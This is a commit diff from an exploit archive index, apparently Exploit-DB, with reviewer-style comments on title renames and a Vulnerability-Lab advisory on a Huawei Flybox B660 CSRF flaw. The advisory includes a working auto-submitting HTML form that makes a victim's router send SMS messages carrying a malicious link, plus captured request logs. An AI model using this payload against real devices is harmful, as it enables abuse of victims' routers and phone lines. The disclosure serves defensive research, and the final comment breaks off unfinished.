DB: 2017-01-17

11 new exploits

Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit
Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption

Mozilla Firefox < 50.1.0 - Use After Free
Mozilla Firefox < 50.1.0 - Use-After-Free

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)
Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)
Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)
Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)
Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)

iSelect v1.4 - Local Buffer Overflow

Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite
Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite
WinaXe Plus 8.7 - Buffer Overflow
DiskBoss Enterprise - GET Buffer Overflow (Metasploit)

Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Photobase 1.2 - 'Language' Local File Inclusion
Joomla! Component Portfol - (vcatid) SQL Injection
Photobase 1.2 - 'Language' Parameter Local File Inclusion
Joomla! Component Portfol 1.2 - 'vcatid' Parameter SQL Injection

dMx READY (25 - Products) Remote Database Disclosure
dMx READY (25 - Products) - Remote Database Disclosure

Joomla! Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection
Joomla! Component GigCalendar 1.0 - SQL Injection

HSPell 1.1 - (cilla.cgi) Remote Command Execution
HSPell 1.1 - 'cilla.cgi' Remote Command Execution

PHP Photo Album 0.8b - (index.php preview) Local File Inclusion
PHP Photo Album 0.8b - 'preview' Parameter Local File Inclusion
Huawei Flybox B660 - Cross-Site Request Forgery
Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting
Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change
Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change
Image Sharing Script 4.13 - Multiple Vulnerabilities
Million Pixels 3 - Authentication Bypass
ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities
Offensive Security 2017-01-17 05:01:17 +00:00
parent b086c09178
commit 7c1c496c25
12 changed files with 1639 additions and 13 deletions


@ -909,7 +909,7 @@ id,file,description,date,author,platform,type,port
7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' Multiple Denial of Services",2009-01-12,securfrog,windows,dos,0
7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite",2009-01-13,Stack,windows,dos,0
7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow (PoC)",2009-01-13,Stack,windows,dos,0
7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0
7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption",2009-01-13,His0k4,windows,dos,0
7776,platforms/hardware/dos/7776.c,"Cisco - VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,hardware,dos,0
7785,platforms/multiple/dos/7785.py,"Oracle TimesTen - Remote Format String (PoC)",2009-01-14,"Joxean Koret",multiple,dos,0
7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0
@ -5340,7 +5340,7 @@ id,file,description,date,author,platform,type,port
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use After Free",2017-01-13,"Marcin Ressel",windows,dos,0
41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6284,7 +6284,7 @@ id,file,description,date,author,platform,type,port
10313,platforms/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0
10319,platforms/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0
10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0
10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0
10321,platforms/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0
10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0
10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0
10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0
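Review bot: the rename is applied to 10321 only, but the very next entry 10323, "HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)", describes the same product and still lacks both the "Microsoft" prefix and the quoted '.hhp' form that this commit gives 10321, 16631, 16648 and 16683. Rename it in the same pass to "Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Universal)"; otherwise a search on the vendor name finds four of the five HHW entries and misses this one.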
@ -6713,7 +6713,7 @@ id,file,description,date,author,platform,type,port
16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
@ -6725,7 +6725,7 @@ id,file,description,date,author,platform,type,port
16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local,0
16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16648,platforms/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@ -6758,7 +6758,7 @@ id,file,description,date,author,platform,type,port
16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0
16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16686,platforms/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local,0
16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@ -8755,6 +8755,7 @@ id,file,description,date,author,platform,type,port
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
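Review bot: the new 41076 title "iSelect v1.4 - Local Buffer Overflow" puts a "v" in front of the version, which no neighbouring entry does ("Cemu 1.6.4b", "Microsoft Windows 8.1 (x64)", "Firejail"); the convention throughout this file is the bare number. Suggest "iSelect 1.4 - Local Buffer Overflow", and the same change in the commit message line that repeats the title.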
@ -9848,7 +9849,7 @@ id,file,description,date,author,platform,type,port
7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,windows,remote,0
7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0
7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0
7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote Command Execution",2009-01-13,Houssamix,windows,remote,0
7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote Command Execution",2009-01-13,Cyber-Zone,windows,remote,0
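Review bot: the 7747 rename still writes the vulnerable method as "(Save)" in parentheses, while the sibling entry 7748 on the next line uses "'Save'" and this same commit converts parenthesised tokens to quoted ones elsewhere (7756 "(CWD)" becomes "'CWD'"). Make it "Word Viewer OCX 3.2 ActiveX - 'Save' Remote File Overwrite" so the two Houssamix file-overwrite entries read alike.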
@ -15219,6 +15220,8 @@ id,file,description,date,author,platform,type,port
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
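Review bot: 41079 "DiskBoss Enterprise - GET Buffer Overflow (Metasploit)" omits the product version and leaves GET unquoted, whereas 41003 two lines above reads "DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)". If the module targets the same 7.5.12 build, put the version in the title; if it covers a range, state the range; and quote 'GET' to match the 'POST' form. The port column also disagrees between the two DiskBoss entries (80 for 41079, 0 for 41003) although both attack the same HTTP service; pick one value for both.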
@ -15824,6 +15827,7 @@ id,file,description,date,author,platform,type,port
40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -20467,18 +20471,18 @@ id,file,description,date,author,platform,type,port
7730,platforms/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,php,webapps,0
7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0
7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0
7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol - (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0
7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Parameter Local File Inclusion",2009-01-11,Osirys,php,webapps,0
7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol 1.2 - 'vcatid' Parameter SQL Injection",2009-01-12,H!tm@N,php,webapps,0
7735,platforms/php/webapps/7735.pl,"Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0
7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0
7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0
7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,php,webapps,0
7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0
7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0
7746,platforms/php/webapps/7746.txt,"Joomla! Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
7746,platforms/php/webapps/7746.txt,"Joomla! Component GigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - 'cilla.cgi' Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,php,webapps,0
7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,php,webapps,0
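Review bot: two of the renames in this hunk change information rather than just format. 7734 gains a version, "Portfol 1.2", that the old title did not carry; check it against the exploit text before this lands, because the files.csv description is what users search by. 7746 loses information instead: the old title named the parameter "(gigcal_gigs_id)", and the other renames in this hunk keep theirs in the quoted form ("'vcatid' Parameter", "'Language' Parameter"), so the consistent result is "Joomla! Component GigCalendar 1.0 - 'gigcal_gigs_id' Parameter SQL Injection".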
@ -20500,7 +20504,7 @@ id,file,description,date,author,platform,type,port
7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7784,platforms/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - (index.php preview) Local File Inclusion",2009-01-14,Osirys,php,webapps,0
7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - 'preview' Parameter Local File Inclusion",2009-01-14,Osirys,php,webapps,0
7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps,0
7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0
7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,asp,webapps,0
@ -37008,3 +37012,10 @@ id,file,description,date,author,platform,type,port
41068,platforms/php/webapps/41068.txt,"MC Inventory Manager Script - Multiple Vulnerabilities",2017-01-15,"Ihsan Sencan",php,webapps,0
41070,platforms/php/webapps/41070.txt,"MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps,0
41071,platforms/php/webapps/41071.txt,"MC Documentation Creator Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps,0
41074,platforms/hardware/webapps/41074.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-12,Vulnerability-Lab,hardware,webapps,0
41075,platforms/php/webapps/41075.txt,"Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting",2017-01-16,"Ahmet Gurel",php,webapps,0
41077,platforms/hardware/webapps/41077.sh,"Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
41078,platforms/hardware/webapps/41078.sh,"Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
41080,platforms/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",php,webapps,0
41081,platforms/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",php,webapps,0
41082,platforms/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",java,webapps,0
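Review bot: 41082's description misspells the vendor as "ManagEnegine"; the product is ManageEngine (the advisory's own Vendor URL points at manageengine.com). The typo is copied from the advisory title, but the description in files.csv is the searchable one, so it should read "ManageEngine ADManager Plus 6.5.40 - Multiple Vulnerabilities" regardless of what the .txt says, and the commit message should follow.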



@ -0,0 +1,206 @@
Document Title:
===============
Huawei Flybox B660 - (POST SMS) CSRF Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2026
Release Date:
=============
2017-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
2026
Common Vulnerability Scoring System:
====================================
4.4
Product & Service Introduction:
===============================
The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.
(Copy of the Homepage: http://setuprouter.com/router/huawei/b660/manual-1184.pdf )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3G/4G router product series.
Vulnerability Disclosure Timeline:
==================================
2017-01-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Huawei
Product: Flybox - Router (Web-Application) B660 3G/4G
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A remote cross-site request forgery vulnerability has been discovered in the official Huawei Flybox B660 3G/4G router product series.
The security vulnerability allows a remote attacker to perform unauthenticated application requests with non-expired browser session
credentials to unauthorized execute specific backend functions.
The vulnerability is located in the `/htmlcode/html/sms.cgi` and `/htmlcode/html/sms_new.asp` modules and the `RequestFile` parameter
of the localhost path URL. Remote attackers are able to send sms messages as malicious bomb to other phone numbers from any Huawei
Flybox B660 via unauthenticated POST method request.
The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4.
Exploitation of the csrf web vulnerability requires a low privilege web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in unauthenticated application requests and manipulation of affected or connected
device backend modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /htmlcode/html/sms.cgi
[+] /htmlcode/html/sms_new.asp
Vulnerable Parameter(s):
[+] RequestFile
Software version of the modem:
1066.12.15.01.200
Hardware version of the modem:
WLB3TCLU
Name of the device:
B660
Hardware version of the router:
WL1B660I001
Software version of the router:
1066.11.15.02.110sp01
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without privilege web-application user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: CSRF Exploit
<html>
<!-- CSRF PoC By SaifAllah benMassaoud -->
<body>
<form id="test" action="http://localhost/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms_new.asp" method="POST">
<input type="hidden" name="action" value="Send" />
<input type="hidden" name="action" value="Send" />
<input type="hidden" name="sms&#95;text&#95;mode" value="1" />
<input type="hidden" name="sms&#95;content&#95;1" value="[Malicious Site + IP Adress/Redirection + File]:=[download]" />
<input type="hidden" name="sms&#95;num" value="1" />
<input type="hidden" name="phone&#95;numbers" value="[Victim PhoneNumber]" />
<input type="hidden" name="page" value="sms&#95;new&#46;asp" />
</form>
<script>document.getElementById('test').submit();</script>
</body>
</html>
--- PoC Session Logs [POST] ---
/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms_new.asp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2059
action=Send&action=Send&sms_text_mode=1&sms_content_1=‡Malicious Site + IP Adress/Redirection + File‰:=‡download‰&sms_num=1&station=
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&phone_numbers=[Victim PhoneNumber]&page=sms_new.asp
HTTP/1.1 200 OK
CACHE-CONTROL: no-cache
Content-Type: text/html
Content-Length: 364
<html><script src="http://cakecdn.info/ad_20160927.js?ver=1&channel=1" id="{6AF30038-1A5F-46F9-AE73-455BB857D493}"></script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>replace</title>
<body>
<script language="JavaScript" type="text/javascript">
var pageName = '/';
top.location.replace(pageName);
</script>
</body>
</html>
Note: Attackers can as well put an auto-submit java-script generated form inside an high traffic website tp exploit.
Security Risk:
==============
The security risk of the cross site request forgery vulnerability in the Huawei Flybox B660 3G/4G router product series is estimated as medium. (CVSS 4.4)
Credits & Authors:
==================
SaifAllah benMassaoud - ( http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud )
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
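Review bot: the advisory contradicts itself on preconditions: the Technical Details paragraph says exploitation "requires a low privilege web-application user account", while the PoC section says it works "without privilege web-application user account" and the rest of the text calls the request unauthenticated. One of these has to be corrected before publication, because it decides whether this is CSRF riding an authenticated admin session or a forgeable request that needs no session at all. Two further problems in the PoC itself: the form posts to "http://localhost/htmlcode/html/sms.cgi?...", which in a victim's browser reaches the victim's own machine rather than the router (the captured session's "Host: localhost" and Referer show this is the tester's setup), so the target should be the gateway's LAN address with a note telling the reader to substitute it; and the hidden input "action=Send" appears twice in both the form and the captured body, which looks like a copy-paste artefact unless the device needs the duplicate, in which case say so. Finally, the captured 200 response contains an external "<script src="http://cakecdn.info/ad_20160927.js...">" tag that is unlikely to be generated by the device's own page; it should be stripped from the log or explained, since as written it reads like ad injection on the tester's network and will send readers hunting 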